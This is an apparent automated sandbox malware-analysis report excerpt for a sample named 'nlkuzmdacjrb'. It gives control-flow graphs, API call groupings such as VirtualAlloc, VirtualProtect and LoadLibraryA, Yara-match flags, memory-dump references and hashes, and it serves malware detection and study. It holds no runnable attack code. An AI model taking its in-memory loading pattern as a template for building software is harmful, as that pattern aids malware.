                                                      control_flow_graph 176 122a433a434-122a433a444 VirtualAlloc 177 122a433a446-122a433a44b 176->177 178 122a433a450-122a433a4fa call 122a433dd5f call 122a433dd17 call 122a433e202 call 122a433dee4 176->178 179 122a433a811-122a433a819 177->179 188 122a433a758-122a433a759 178->188 189 122a433a500-122a433a535 call 122a433d854 178->189 190 122a433a765-122a433a772 188->190 197 122a433a537-122a433a53c 189->197 198 122a433a541-122a433a548 189->198 192 122a433a774-122a433a782 190->192 193 122a433a7db-122a433a80c call 122a433dd17 190->193 192->193 195 122a433a784-122a433a7d1 call 122a433dd17 192->195 193->179 195->193 197->179 199 122a433a574-122a433a581 198->199 202 122a433a583-122a433a58a 199->202 203 122a433a54a-122a433a570 LoadLibraryA 199->203 206 122a433a5e0-122a433a5ed 202->206 203->199 207 122a433a58c-122a433a5d6 call 122a433d854 206->207 208 122a433a5ef-122a433a5fc 206->208 217 122a433a5dc 207->217 218 122a433a75b-122a433a75c 207->218 211 122a433a612-122a433a61f 208->211 212 122a433a5fe-122a433a60c call 122a433a81a 208->212 215 122a433a631-122a433a63d 211->215 216 122a433a621-122a433a62f 211->216 212->211 223 122a433a75e-122a433a75f 212->223 220 122a433a640-122a433a64d 215->220 216->220 217->206 218->190 221 122a433a69f-122a433a6a8 220->221 222 122a433a64f-122a433a662 call 122a433d964 220->222 225 122a433a6b5-122a433a6bc call 122a433b9b1 221->225 226 122a433a6aa-122a433a6b3 221->226 230 122a433a664-122a433a671 222->230 231 122a433a677-122a433a67e call 122a433db6b 222->231 223->190 232 122a433a6c1 225->232 226->225 228 122a433a6c6-122a433a6cf 226->228 233 122a433a6dc-122a433a6f1 call 122a433ad4e 228->233 234 122a433a6d1-122a433a6da 228->234 230->231 236 122a433a761-122a433a762 230->236 240 122a433a683-122a433a68a 231->240 232->190 243 122a433a6f3-122a433a701 call 122a433b112 233->243 244 122a433a706-122a433a719 call 122a433b78b 233->244 234->233 238 122a433a71b-122a433a724 234->238 236->190 241 122a433a726-122a433a72f 238->241 242 122a433a731-122a433a73d call 122a433c4ce 238->242 240->221 245 122a433a68c-122a433a699 240->245 241->242 246 122a433a73f-122a433a748 241->246 242->190 243->244 244->190 245->221 250 122a433a764 245->250 246->190 252 122a433a74a-122a433a756 call 122a433c2b6 246->252 250->190 252->190
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2251423159.00000122A40B0000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000122A40B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_122a40b0000_nlkuzmdacjrb.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 92c0ea50874150b054a817daf60ee9fc003736d41b50868d266c4d75121e88d1
                                                      • Instruction ID: 512332ba6d81b3da8c353500fe2a467b70062a1335a8694128f9d468ab5b774c
                                                      • Opcode Fuzzy Hash: 92c0ea50874150b054a817daf60ee9fc003736d41b50868d266c4d75121e88d1
                                                      • Instruction Fuzzy Hash: F4E18E30A1490D9FEF94EB9CD485FAEB7F1FB98304F6045A4E109DBA91DA74E891CB40

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true
                                                      • Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd
                                                      Similarity
                                                      • API ID: EnumModulesProcessmemset
                                                      • String ID:
                                                      • API String ID: 2788162479-0
                                                      • Opcode ID: b080baafe9dc283cbf222f303f25dea2ccf790df6adc1ae6ee288a2e3dca6954
                                                      • Instruction ID: fbfc2f9a378acde28916ded30420b138e4f9da880b6c061885914984d05dd781
                                                      • Opcode Fuzzy Hash: b080baafe9dc283cbf222f303f25dea2ccf790df6adc1ae6ee288a2e3dca6954
                                                      • Instruction Fuzzy Hash: C911E962F1865145EB00DF65A5053AE2361FB09BB8F900621DE6D637E6CF38E655F304

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true
                                                      • Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd
                                                      Similarity
                                                      • API ID: CloseErrorHandleLast
                                                      • String ID:
                                                      • API String ID: 918212764-0
                                                      • Opcode ID: ba2161fbdca203ce282a3bad5a3a37409828693ed662d9c325a3d7b7554e52e4
                                                      • Instruction ID: 3f3526cb9b5417b13969b827c95978b3dba97da6da668d77f3a2a5f234d84737
                                                      • Opcode Fuzzy Hash: ba2161fbdca203ce282a3bad5a3a37409828693ed662d9c325a3d7b7554e52e4
                                                      • Instruction Fuzzy Hash: A2110A36F10B419CE7209FB0E4453EC37B8B748328F544235DAAC96BA9EF389199C750

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 274 122a433b9b1-122a433bb37 275 122a433bb39-122a433bb4d 274->275 276 122a433bb4f-122a433bb5e 274->276 277 122a433bb64-122a433bc02 275->277 276->277 279 122a433c2a9-122a433c2aa 277->279 280 122a433bc08-122a433bc47 VirtualAlloc 277->280 283 122a433c2ad-122a433c2b5 279->283 281 122a433bc4d-122a433bc7a 280->281 282 122a433c2ac 280->282 284 122a433bd19-122a433bd2d 281->284 282->283 285 122a433bd33-122a433bd5d 284->285 286 122a433bc7f-122a433bd12 call 122a433dd5f 284->286 288 122a433be9b-122a433bea7 285->288 286->284 290 122a433bd62-122a433bdd0 288->290 291 122a433bead-122a433bef9 288->291 296 122a433bdd6-122a433bde3 290->296 292 122a433bfda-122a433bfe5 291->292 294 122a433bfeb-122a433bff7 292->294 295 122a433befe-122a433bf10 292->295 297 122a433c258-122a433c278 294->297 298 122a433bffd-122a433c00e 294->298 299 122a433bfa9-122a433bfc6 295->299 300 122a433be92-122a433be94 296->300 301 122a433bde9-122a433be04 296->301 310 122a433c27e-122a433c286 297->310 304 122a433c224-122a433c256 298->304 305 122a433c014-122a433c02e 298->305 302 122a433bf15-122a433bf25 299->302 303 122a433bfcc-122a433bfd4 299->303 300->288 307 122a433be36-122a433be7b 301->307 308 122a433be06-122a433be34 301->308 311 122a433bf27-122a433bf89 302->311 312 122a433bf8b-122a433bf9b 302->312 303->292 304->310 309 122a433c034-122a433c062 305->309 305->310 321 122a433be7d-122a433be8d 307->321 308->321 309->310 316 122a433c068-122a433c0b9 309->316 310->283 315 122a433c288-122a433c2a7 310->315 313 122a433bfa1-122a433bfa2 311->313 312->313 314 122a433c27a-122a433c27b 312->314 313->299 314->310 315->283 320 122a433c0bf-122a433c10a call 122a433b962 316->320 325 122a433c154-122a433c162 320->325 326 122a433c10c-122a433c152 320->326 321->296 325->320 327 122a433c168-122a433c170 325->327 326->327 328 122a433c176-122a433c1a2 327->328 329 122a433c27d 327->329 328->310 331 122a433c1a8-122a433c222 call 122a433dd5f call 122a433dd17 328->331 329->310 331->310
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2251423159.00000122A40B0000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000122A40B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_122a40b0000_nlkuzmdacjrb.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: fdae6b7c3fcf00f9228dbd9d5a3c96208eade3a9fdb42b23f6d738a870b35c23
                                                      • Instruction ID: 8f4039cc41d2e65a49bb5b18d889b0f82800dd1930b08185e750ca2771c08191
                                                      • Opcode Fuzzy Hash: fdae6b7c3fcf00f9228dbd9d5a3c96208eade3a9fdb42b23f6d738a870b35c23
                                                      • Instruction Fuzzy Hash: 8B52C170604A8D8FDFA4EF5CC888BE937E1FB68315F148165E84DCB661DA74EA91CB40
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true
                                                      • Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$CurrentProcessmemset
                                                      • String ID: ($SymAddrIncludeInlineTrace$SymFromInlineContextW$SymGetLineFromInlineContextW$SymQueryInlineTrace$X
                                                      • API String ID: 3017635649-489855731
                                                      • Opcode ID: 91fedcdd78195c4bbe2e5efc2779d755cb09886c5593213c54159d6beb6d4a23
                                                      • Instruction ID: 7da64291b7beac43c81a0a0b5ebab6a691543ee9c202ef4ae814512253f25afa
                                                      • Opcode Fuzzy Hash: 91fedcdd78195c4bbe2e5efc2779d755cb09886c5593213c54159d6beb6d4a23
                                                      • Instruction Fuzzy Hash: D502A032908AC682EB668F18E4513FA77A0FB883A4F444236DACE837A5DF3DD545D740
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true
                                                      • Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 313767242-0
                                                      • Opcode ID: 1f7091696ee9927cd8a0f810869b6f58b34cd09c9738cf120ea40d67f48f4156
                                                      • Instruction ID: 3719e6083a95dd8c2ebdf7a001fe832bd1bdda5411dc4fa4db8f9b0526706868
                                                      • Opcode Fuzzy Hash: 1f7091696ee9927cd8a0f810869b6f58b34cd09c9738cf120ea40d67f48f4156
                                                      • Instruction Fuzzy Hash: D6318173609B8186EB60CF60E8807ED3360FB88715F44403ADA8E87BAADF78C548D714
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true
                                                      • Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$CurrentProcess$Mutex$CloseCreateHandleLibraryLoadObjectReleaseSingleWaitlstrlenmemset
                                                      • String ID: EnumerateLoadedModulesW64$SymGetOptions$SymGetSearchPathW$SymInitializeW$SymSetOptions$SymSetSearchPathW$assertion failed: len >= 0$dbghelp.dll
                                                      • API String ID: 18767598-310313858
                                                      • Opcode ID: fc5280adfdf2b7853c24edd48576d698f2f70bb9135b4bc86369705f9db9025e
                                                      • Instruction ID: 650316608e2a064bc56194d738b01e9cb4b09462f0adda2fb16415ad2ff3531b
                                                      • Opcode Fuzzy Hash: fc5280adfdf2b7853c24edd48576d698f2f70bb9135b4bc86369705f9db9025e
                                                      • Instruction Fuzzy Hash: 29F18B22A09B5295FB119F29A8503B923A0BF4C768F44463ADD8DC77B6DF3CE059A300
                                                      APIs
                                                      Strings
                                                      • NTDLL.DLL, xrefs: 00007FF63B54D645
                                                      • assertion failed: self.is_char_boundary(new_len)/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\string.rs, xrefs: 00007FF63B54D990
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true
                                                      • Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatHandleLastMessageModulememset
                                                      • String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\string.rs
                                                      • API String ID: 1434010500-1267143961
                                                      • Opcode ID: a2fdf3f50ade1514b8e8d220692a852cc6b1829e34b8d44ffabc660db15a48ab
                                                      • Instruction ID: 027f8489e511273107e3b499fb0ddd17010914c772257591ab5184cc1e1f47b0
                                                      • Opcode Fuzzy Hash: a2fdf3f50ade1514b8e8d220692a852cc6b1829e34b8d44ffabc660db15a48ab
                                                      • Instruction Fuzzy Hash: 06A1B332A09BC284E7718F25D8447F827A0FB493A4F454136DADD87BE6DF789A95E300
                                                      APIs
                                                      Strings
                                                      • internal error: entered unreachable code/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\vec\mod.rs, xrefs: 00007FF63B547ED1
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true
                                                      • Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnvironmentVariable
                                                      • String ID: internal error: entered unreachable code/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\vec\mod.rs
                                                      • API String ID: 2691138088-50058851
                                                      • Opcode ID: 6d5b2da78fe2a7d3d0cf03d165010f37d5f18a7676820ac551e906dfb98e3d0b
                                                      • Instruction ID: 6867fb0cf1dd9703eab310d842c44006cb3ee771dc42c8b187d3c83596a69930
                                                      • Opcode Fuzzy Hash: 6d5b2da78fe2a7d3d0cf03d165010f37d5f18a7676820ac551e906dfb98e3d0b
                                                      • Instruction Fuzzy Hash: 9881E462A04AC285EB318F25DD443E96365FF18BB8F444135DE9C9B7A6DF3C92959300
                                                      APIs
                                                      Strings
                                                      • stack backtrace:, xrefs: 00007FF63B54A7FF
                                                      • note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...], xrefs: 00007FF63B54AAE2
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true
                                                      • Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$CaptureContextCurrentDirectoryEntryFunctionLookupUnwindVirtualmemset
                                                      • String ID: note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...]$stack backtrace:
                                                      • API String ID: 2744335978-2918537110
                                                      • Opcode ID: 72805cd616d666f2ac6967fcb4c1961583533f6335081f1f1fdb27a414d68f49
                                                      • Instruction ID: 30ce4d4796a48fac7e249e06c80b9b6dbc72e5a55868a4def2780f6a9428fdc2
                                                      • Opcode Fuzzy Hash: 72805cd616d666f2ac6967fcb4c1961583533f6335081f1f1fdb27a414d68f49
                                                      • Instruction Fuzzy Hash: 18A10D62604FC18CEB718F25EC403EA37A4FB4975DF441129CA8D8BBAADF789259D701
                                                      APIs
                                                      Strings
                                                      • internal error: entered unreachable code/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\vec\mod.rs, xrefs: 00007FF63B547B8D
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true
                                                      • Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$CurrentDirectory
                                                      • String ID: internal error: entered unreachable code/rustc/9b00956e56009bab2aa15d7bff10916599e3d6d6\library\alloc\src\vec\mod.rs
                                                      • API String ID: 3993060814-50058851
                                                      • Opcode ID: 405081b865c5e5ce2a1847109fdb6946bbed8eb7c725cbd3201916c53e7494c6
                                                      • Instruction ID: 1a3e36013e1b8f7bc04ea84d8c3e77c395b314fda75163de822a6cebfe669dea
                                                      • Opcode Fuzzy Hash: 405081b865c5e5ce2a1847109fdb6946bbed8eb7c725cbd3201916c53e7494c6
                                                      • Instruction Fuzzy Hash: 5951D362A08BC245E7358F26AC443E96354FB08BB8F448535DEAD977A6DF3CA3959300
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true
                                                      • Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd
                                                      Similarity
                                                      • API ID: Handle$CloseConsoleErrorLastMode
                                                      • String ID: called `Result::unwrap()` on an `Err` value
                                                      • API String ID: 1170577072-2333694755
                                                      • Opcode ID: e01a37204d0ed50316ae64f771dd6798684bd3ff6aa2ef4f1ae7c1548a6cce87
                                                      • Instruction ID: 008163130cd2d51fd44a31843e850fdf0eb4f950deb22f99c41df80356ce27ec
                                                      • Opcode Fuzzy Hash: e01a37204d0ed50316ae64f771dd6798684bd3ff6aa2ef4f1ae7c1548a6cce87
                                                      • Instruction Fuzzy Hash: FC81D462A0878298FB11CF60E8503FD2760AB087A8F458536DEDE937E6DE7CD595E300
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true
                                                      • Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd
                                                      Similarity
                                                      • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                                                      • String ID:
                                                      • API String ID: 1956605914-0
                                                      • Opcode ID: 0fe4d206bdc36d7527652ce4d84f90233b9924d4907be3a152e2467c999bc63b
                                                      • Instruction ID: f7fb7ae332da94bf0909e3fe20cc6fefdb076da06713fd302c425cd4cd5b8ae9
                                                      • Opcode Fuzzy Hash: 0fe4d206bdc36d7527652ce4d84f90233b9924d4907be3a152e2467c999bc63b
                                                      • Instruction Fuzzy Hash: 3751DF62A1869242FB208F50A9443BA6651EF8C7A0F554136E9CEC3BF6DF3CD995E340
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true
                                                      • Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: SetThreadDescription$kernel32
                                                      • API String ID: 1646373207-1950310818
                                                      • Opcode ID: 88fa0e13c17c9b79e8c73b9d4447e022dd5f321e9298a6fccb875f5b167bc93c
                                                      • Instruction ID: f2c473ee37f69bc2703e066452191a3846606cc334ccb898f5b0fd768d93c5d7
                                                      • Opcode Fuzzy Hash: 88fa0e13c17c9b79e8c73b9d4447e022dd5f321e9298a6fccb875f5b167bc93c
                                                      • Instruction Fuzzy Hash: CFF03050F4A78A92E94E8F45BD941A42260AF0CBF0F84843BC88D87775EF7CA555E300
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true
                                                      • Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd
                                                      Similarity
                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                      • String ID:
                                                      • API String ID: 2933794660-0
                                                      • Opcode ID: 294a0a96a0f81ae7afaf7b16e31fb50118d3dcf11c965d61aa8162dd32814fe9
                                                      • Instruction ID: 1663116331cbe93e61812c5ba61bf2e27f89deb34869d2a079b79b1e2b7dc844
                                                      • Opcode Fuzzy Hash: 294a0a96a0f81ae7afaf7b16e31fb50118d3dcf11c965d61aa8162dd32814fe9
                                                      • Instruction Fuzzy Hash: A7113026B15F068AEB00CF64E8543B833A4FB1D768F441E36DAAD867A4DF78D154C340
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2252455201.00007FF63B541000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF63B540000, based on PE: true
                                                      • Associated: 00000012.00000002.2252438807.00007FF63B540000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2252477020.00007FF63B560000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254122255.00007FF63B8DB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000012.00000002.2254736037.00007FF63B8DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_7ff63b540000_nlkuzmdacjrb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Box<dyn Any><unnamed>$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs
                                                      • API String ID: 0-3513654867
                                                      • Opcode ID: ac8c48a5e2f6dbcb9a386e2807e7f6b30d02f319061442bdbbba9e6a5cce45a5
                                                      • Instruction ID: cada33d7dc2b4d88540df6453c6248d553ba5e63902b3458f0fc840007bedde1
                                                      • Opcode Fuzzy Hash: ac8c48a5e2f6dbcb9a386e2807e7f6b30d02f319061442bdbbba9e6a5cce45a5
                                                      • Instruction Fuzzy Hash: 5FB18E32A09B4689EB61CF24D4403BD37A0EB5C7A8F444136DA8D87BA6DF3DE565E340

                                                      Execution Graph

                                                      Execution Coverage:2.4%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:851
                                                      Total number of Limit Nodes:2
                                                      execution_graph 2838 140001ac3 2839 140001a70 2838->2839 2840 14000199e 2839->2840 2841 140001b36 2839->2841 2845 140001b53 2839->2845 2843 140001a0f 2840->2843 2844 1400019e9 VirtualProtect 2840->2844 2842 140001ba0 4 API calls 2841->2842 2842->2845 2844->2840 1989 140001ae4 1990 140001a70 1989->1990 1991 14000199e 1990->1991 1992 140001b36 1990->1992 1995 140001b53 1990->1995 1994 140001a0f 1991->1994 1996 1400019e9 VirtualProtect 1991->1996 1997 140001ba0 1992->1997 1996->1991 2000 140001bc2 1997->2000 1998 140001c04 memcpy 1998->1995 2000->1998 2001 140001c45 VirtualQuery 2000->2001 2002 140001cf4 2000->2002 2001->2002 2006 140001c72 2001->2006 2003 140001d23 GetLastError 2002->2003 2004 140001d37 2003->2004 2005 140001ca4 VirtualProtect 2005->1998 2005->2003 2006->1998 2006->2005 2034 140001404 2107 140001394 2034->2107 2036 140001413 2037 140001394 2 API calls 2036->2037 2038 140001422 2037->2038 2039 140001394 2 API calls 2038->2039 2040 140001431 2039->2040 2041 140001394 2 API calls 2040->2041 2042 140001440 2041->2042 2043 140001394 2 API calls 2042->2043 2044 14000144f 2043->2044 2045 140001394 2 API calls 2044->2045 2046 14000145e 2045->2046 2047 140001394 2 API calls 2046->2047 2048 14000146d 2047->2048 2049 140001394 2 API calls 2048->2049 2050 14000147c 2049->2050 2051 140001394 2 API calls 2050->2051 2052 14000148b 2051->2052 2053 140001394 2 API calls 2052->2053 2054 14000149a 2053->2054 2055 140001394 2 API calls 2054->2055 2056 1400014a9 2055->2056 2057 140001394 2 API calls 2056->2057 2058 1400014b8 